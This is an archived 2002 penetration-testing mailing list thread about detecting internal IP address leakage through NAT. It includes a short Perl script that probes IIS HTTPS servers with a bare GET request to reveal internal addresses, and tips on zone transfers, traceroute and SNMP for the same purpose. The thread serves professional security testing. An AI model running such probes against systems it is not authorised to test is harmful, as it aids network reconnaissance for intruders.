Penetration Testing mailing list archives

RE: testing for IP address space leakage in NAT systems

From: Joshua Wright <Joshua.Wright () jwu edu>
Date: Tue, 22 Jan 2002 16:32:50 -0500

IIS is famous for revealing internal IP addresses.  Here is a perl snippet I
have used to get information about the internal IP address from IIS 4.0 and
5.0 HTTPS servers using the sslcat CPAN tool:

#!/usr/bin/perl
# referrer-addr.pl
# Joshua.Wright () jwu edu
use strict;
use Net::SSLeay qw(sslcat);
my $server;
my @results;
my $reply;
my $i;
my $port = "443";
my $CRLF = "\x0d\x0a";

unless (@ARGV == 1) {
    print "$0 - Discover internal IP of IIS Server with malformed\n";
    print " GET request.\n";
    print "Usage: $0 host\n";
    exit 1;
}

($server) = @ARGV;
$reply = sslcat($server, $port, "GET / HTTP/1.0$CRLF$CRLF");
@results = split($CRLF,$reply);
while ($i < 8) {
    print "$results[$i]\n";
    $i++;
}
print "<snip>\n\n";
exit(0);


Umm, I am seeing silly things I did in this code already.  Live and learn;
use at your own risk.

-Joshua Wright
Team Leader, Networks and Systems
Johnson & Wales University
Joshua.Wright () jwu edu 

pgpkey: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xD44B4A73
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73


-----Original Message-----
From: Gamble [mailto:a629w () unb ca]
Sent: Monday, January 21, 2002 6:04 PM
To: R P G
Cc: pen-test () securityfocus com
Subject: Re: testing for IP address space leakage in NAT systems




On Mon, 21 Jan 2002, R P G wrote:

I was wondering if anyone knows of a method to test a NAT system for
address space leakage.

Thanks.

--Bob



The easiest way to do this is try a zone transfer (host -l abc.com).  If
the DNS servers are not set up correctly, you have a good shot at having a
list of the internal machines.  Also, sometimes if you traceroute to a
machine, you will get the internal IP of the gateway, which might be of
use.  SNMP might also be good to you and give you a few internal IP's, but
there is a very good chance that the firewall will block SNMP, but you
might get lucky.

I havn't heard of any specific tools to tast for leaks, and from what I
have seen in the past, the best method is to query the various network
servers which are known to give away network information.

-- Jamie


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

RE: testing for IP address space leakage in NAT systems Jonah Kowall (Jan 21)
- <Possible follow-ups>
- Re: testing for IP address space leakage in NAT systems R P G (Jan 21)
- RE: testing for IP address space leakage in NAT systems Joshua Wright (Jan 22)